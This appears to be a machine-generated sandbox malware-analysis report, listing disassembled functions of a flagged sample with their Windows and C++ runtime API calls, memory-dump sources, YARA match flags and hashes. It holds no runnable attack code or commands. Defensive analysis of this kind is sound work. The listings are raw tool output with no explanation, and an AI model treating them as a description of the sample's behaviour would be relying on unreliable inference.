                                                  • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                  • String ID: 11@
                                                  • API String ID: 2524916244-1785270423
                                                  • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                  • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                  Function 0301D752 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 03021DC9
                                                    • Part of subcall function 03020CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 03020CEB
                                                    • Part of subcall function 03020CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 03020CF5
                                                  • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 03021DE2
                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 03021E28
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                  • String ID: 11@
                                                  • API String ID: 2524916244-1785270423
                                                  • Opcode ID: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction ID: 98ea0ed57572146c52ff3448560e9066000f565c6f554e182ac26ca3b111172b
                                                  • Opcode Fuzzy Hash: 2add40394b7d6c28252d521bf6fb9763fee22b751befcaa1b229b54f0d7d8064
                                                  • Instruction Fuzzy Hash: 4B018C7AA023348BDF19EB64C8947ADBBB6AFC4310F184495C9026B384CB75A905CB91
                                                  Function 0041DA2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                  • String ID: 11@$pContext
                                                  • API String ID: 1687795959-1086721755
                                                  • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                  • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                  • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                  • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                  Function 0304016B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,0304011C,00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002), ref: 0304018B
                                                  • GetProcAddress.KERNEL32(00000000,004496C4), ref: 0304019E
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0304011C,00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002), ref: 030401C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: 11@
                                                  • API String ID: 4061214504-1785270423
                                                  • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                  • Instruction ID: 1c95566848db1b322f8ecf9d4922fb8d014c21effab8100f3d96a6aa5880d024
                                                  • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                  • Instruction Fuzzy Hash: 77F0A934A01208FBDB10DF94DC49BAEFFF8EF05B12F1401B8F905A21A0CB749A40CA88
                                                  Function 0301C8A4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0301C903
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction ID: 34322473756c0cc8ea7619f2d45932c022420b11178758972838e184582a9ea9
                                                  • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                  • Instruction Fuzzy Hash: 2DF02B73C413086BEB44EA54CC81BEF73D85B05215F04846AEE166A082E7E8DA19C7A5
                                                  Function 00428DEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                  • String ID: f(@
                                                  • API String ID: 3213686812-2560262586
                                                  • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                  • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                  • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                  • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                  Function 03050911 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog3_catchmake_shared
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3472968176-2084237596
                                                  • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                  • Instruction ID: c5e13afb70d03800ba201c8f27ea4f547f000a04bf221ec5d9b98c96abbe9713
                                                  • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                  • Instruction Fuzzy Hash: 16F0B878506318DFDB51EF64C44169DFB68AF86B04F498093F8445F324C77A9945CBA1
                                                  Function 0042DF9D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                  • String ID: f(@
                                                  • API String ID: 3213686812-2560262586
                                                  • Opcode ID: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                  • Instruction ID: 0285dfc7d7792d99b816c6e179ba3485ab9a4e2f62b66e3f0321d916b514c371
                                                  • Opcode Fuzzy Hash: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                  • Instruction Fuzzy Hash: EEF0557078432535FA203BA2BD0FB961A240F10B0EF56002BBF09991C3DEEC9690416D
                                                  Function 004242E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                  • String ID: pScheduler
                                                  • API String ID: 1381464787-923244539
                                                  • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                  • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                  • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                  • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                  Function 0302E8A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0302E8C6
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0302E8D9
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0302E8E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                  • String ID: 11@
                                                  • API String ID: 1990795212-1785270423
                                                  • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                  • Instruction ID: 366ece37ca00f861bb7467c549db53307d437ddc10353b2bebab5a7917039362
                                                  • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                  • Instruction Fuzzy Hash: 69E06839B0020827CB00FB29DC05CADBBEDAFC1A103140066ED11A7391DFB4AA08C6D4
                                                  Function 0042E05D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                  • _free.LIBCMT ref: 0042E089
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CloseFreeHandleLibrary_free
                                                  • String ID: -B
                                                  • API String ID: 621396759-1993606306
                                                  • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                  • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                  • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                  • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                  Function 00415DAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                  • String ID: pScheduler$version
                                                  • API String ID: 1687795959-3154422776
                                                  • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                  • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                  • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                  • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                  Function 004358B8 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                  • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                  • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                  • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                  Function 03045B1F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                  • Instruction ID: f6a5f53850b7ccdd46b32f384b1a01447066d6bac67c551c3d518764e54ec52e
                                                  • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                  • Instruction Fuzzy Hash: DDA147B6A027869FDB26CF18CC907BEFBE5EF57210F1845BDE9859B281C6348A41C750
                                                  Function 0043FA28 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                  • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                  • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                  • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                  Function 0304FC8F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                  • Instruction ID: ee550f9f8ad7cbe61ec44635ef33ad16c42451373445e694c73b47a4ee61567b
                                                  • Opcode Fuzzy Hash: 9ac602f6531e549f45100aa0bb5cc862a8e670c03d425190f2dd11a7ce93b9af
                                                  • Instruction Fuzzy Hash: A1412DF69032026BDB24EFB99C44BFE76AAEF86670F180675F428DA1D0D73047118761
                                                  Function 03046B24 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0304049A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 03046B71
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 03046BFA
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 03046C0C
                                                  • __freea.LIBCMT ref: 03046C15
                                                    • Part of subcall function 0304392E: RtlAllocateHeap.NTDLL(00000000,0301DAFC,00000000), ref: 03043960
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: 3871a130c6b9b3006aa1f46d6ff278bf932d4d7330f30c68a16d81a1f714d6d8
                                                  • Instruction ID: 27e7bf152892d2c0495426e099d55169d0c96eda9bd9d4c015ea41c4a5eb1c8c
                                                  • Opcode Fuzzy Hash: 3871a130c6b9b3006aa1f46d6ff278bf932d4d7330f30c68a16d81a1f714d6d8
                                                  • Instruction Fuzzy Hash: E63182B2A0121AAFDF25DF64DC84DEE7BA5EB42710F084278EC15DB150E736DA90CB90
                                                  Function 00401FB6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(00000005), ref: 00401FCB
                                                  • UpdateWindow.USER32 ref: 00401FD3
                                                  • ShowWindow.USER32(00000000), ref: 00401FE7
                                                  • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$MoveUpdate
                                                  • String ID:
                                                  • API String ID: 1339878773-0
                                                  • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                  • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                  • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                  • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                  Function 004290E9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                    • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                    • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                  • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                  • String ID:
                                                  • API String ID: 737400349-0
                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                  • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                  • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                  Function 03039350 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0303936A
                                                    • Part of subcall function 030392B7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 030392E6
                                                    • Part of subcall function 030392B7: ___AdjustPointer.LIBCMT ref: 03039301
                                                  • _UnwindNestedFrames.LIBCMT ref: 0303937F
                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 03039390
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 030393B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                  • String ID:
                                                  • API String ID: 737400349-0
                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                  • Instruction ID: f1e5e60acde3b99cf2192dc5fd3330a3a087eea3a29e38c1b79199d96ff07c9d
                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                  • Instruction Fuzzy Hash: 59011776101249BBCF129E95CC44EEB7BBDEF8A754F044004FE48AA120C772E861DBA1
                                                  Function 00434F4F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                  • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                  • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                  • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                  Function 030451B6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0304515D,00000000,00000000,00000000,00000000,?,03045415,00000006,0044A378), ref: 030451E8
                                                  • GetLastError.KERNEL32(?,0304515D,00000000,00000000,00000000,00000000,?,03045415,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,03042233), ref: 030451F4
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0304515D,00000000,00000000,00000000,00000000,?,03045415,00000006,0044A378,0044A370,0044A378,00000000), ref: 03045202
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                  • Instruction ID: 51c279038f7c29c14a9d1cb86ef020b856846bf2cc940998118bb264803e115d
                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                  • Instruction Fuzzy Hash: 8F01D87A6132226BC761CF69AD4495BB7D8AF07E61B140571F905D3140D720D600C6E4
                                                  Function 0042614E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                  • String ID:
                                                  • API String ID: 78362717-0
